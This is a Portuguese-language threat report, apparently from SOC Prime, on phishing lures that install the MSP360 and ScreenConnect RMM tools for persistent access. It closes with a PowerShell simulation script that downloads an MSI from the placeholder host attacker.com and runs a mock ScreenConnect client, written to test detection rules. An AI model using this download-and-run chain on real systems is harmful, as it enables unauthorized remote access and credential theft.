SOC Prime Bias: High

01 Oct 2026 08:13 UTC

Phishing Abusa de Ferramentas RMM Para Acesso Persistente

Author Photo
SOC Prime Team linkedin icon Seguir
Phishing Abusa de Ferramentas RMM Para Acesso Persistente
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumo

Os atores de ameaça estão utilizando campanhas de phishing para entregar um instalador legítimo do MSP360 RMM disfarçado como software confiável. Uma vez lançado, o instalador estabelece persistência e posteriormente baixa e implanta o ConnectWise ScreenConnect, proporcionando aos atacantes um canal adicional de acesso remoto. Isso permite atividades pós-comprometimento adicionais, incluindo roubo de credenciais e coleta de dados sensíveis.

Investigação

Os Especialistas da Microsoft Defender identificaram vários atrativos de phishing se passando por Zoom, Adobe e convites de reunião legítimos para distribuir o MSP360 v2.5.0.67. Os pesquisadores reconstruíram a cadeia de infecção, rastreando a execução inicial do usuário e a elevação de UAC através da instalação de serviço e implantação de ferramentas RMM secundárias. A investigação também revelou que os atacantes abusam de plataformas de nuvem confiáveis, incluindo Amazon S3 e Dropbox, para hospedar cargas maliciosas.

Mitigação

As organizações devem controlar estritamente as ferramentas RMM aprovadas aplicando MFA e implementando políticas de Controle de Aplicativos para evitar instalações não autorizadas. Regras de bloqueio baseadas em certificado podem restringir ainda mais aplicativos assinados específicos. O fortalecimento das defesas de endpoint através da proteção antivírus entregue pela nuvem e regras de Redução de Superfície de Ataque também é essencial para reduzir a exposição.

Resposta

Quando instalações RMM não autorizadas são descobertas, as equipes de segurança devem redefinir imediatamente as credenciais associadas às instalações de serviço afetadas. Suspeita de comprometimento de contas de nível de sistema requer uma investigação abrangente para determinar o escopo completo do ataque. Revisar logs de detecção de endpoint para identificar sessões de gerenciamento remoto suspeitas e atividades relacionadas ao pós-comprometimento.

Fluxo de Ataque

Ainda estamos atualizando esta parte.

Detecções

Download ou Upload via Powershell (via cmdline)

Equipe SOC Prime
30 Set 2026

Execução de Mudança de Página de Código Incomum (via cmdline)

Equipe SOC Prime
30 Set 2026

Software de Acesso / Gestão Remota Alternativa (via process_creation)

Equipe SOC Prime
30 Set 2026

Chamar Métodos .NET Suspeitos do Powershell (via powershell)

Equipe SOC Prime
30 Set 2026

Comando e Controle Suspeito por Solicitação DNS de Domínio de Nível Superior (TLD) Incomum (via dns)

Equipe SOC Prime
30 Set 2026

IOCs (HashSha256) para detectar: Phishing Abusa Ferramentas RMM para Acesso Persistente

Regras de IA SOC Prime
30 Set 2026

IOCs (HashSha1) para detectar: Phishing Abusa Ferramentas RMM para Acesso Persistente

Regras de IA SOC Prime
30 Set 2026

Detectar Invoke-WebRequest do PowerShell para Download de Pacote MSI Remoto [Windows Powershell]

Regras de IA SOC Prime
30 Set 2026

Phishing Abusa Ferramentas RMM para Acesso Persistente [Criação de Processo do Windows]

Regras de IA SOC Prime
30 Set 2026

Execução de Simulação

  • Narrativa de Ataque & Comandos: Um adversário inicia uma campanha de spearphishing. A vítima clica em um link que aciona um comando PowerShell de uma linha. Este comando usa Invoke-WebRequest para baixar ClientSetup.msi (simulando o instalador do ScreenConnect) de um servidor remoto. Uma vez baixado, o atacante executa o MSI, e o passo final da simulação envolve o lançamento de ScreenConnect.WindowsClient.exe para imitar a sessão de acesso remoto estabelecida. Esta sequência é projetada para acionar o selection_2 AND selection_3 lógica da regra.

  • Script de Teste de Regressão:

    # Simulação de Implementação de RMM Baseada em Phishing
    $tempDir = $env:TEMP
    $msiName = "ClientSetup.msi"
    $exeName = "ScreenConnect.WindowsClient.exe"
    $msiPath = Join-Path $tempDir $msiName
    $exePath = Join-Path $tempDir $exeName
    
    # 1. Simular o Download PowerShell (Parte A da Seleção 2)
    Write-Host "[+] Simulando download de MSI via PowerShell..."
    # Usando um arquivo fictício para simular o download do MSI
    New-Item -Path $msiPath -ItemType File -Force
    
    # Este comando corresponde à lógica da regra 'Invoke-WebRequest' e 'ClientSetup.msi'
    powershell.exe -Command "Invoke-WebRequest -Uri 'http://attacker.com/ClientSetup.msi' -OutFile '$msiPath'"
    
    # 2. Criar um executável fictício para simular o cliente ScreenConnect (Seleção 3)
    Write-Host "[+] Criando executável fictício do ScreenConnect..."
    New-Item -Path $exePath -ItemType File -Force
    
    # 3. Executar o cliente (Seleção 3 e conclusão da Seleção 2)
    Write-Host "[+] Executando Cliente ScreenConnect..."
    Start-Process -FilePath $exePath
  • Comandos de Limpeza:

    # Limpar artefatos de simulação
    Remove-Item -Path "$env:TEMPClientSetup.msi" -Force -ErrorAction SilentlyContinue
    Remove-Item -Path "$env:TEMPScreenConnect.WindowsClient.exe" -Force -ErrorAction SilentlyContinue
    Write-Host "[+] Limpeza completa."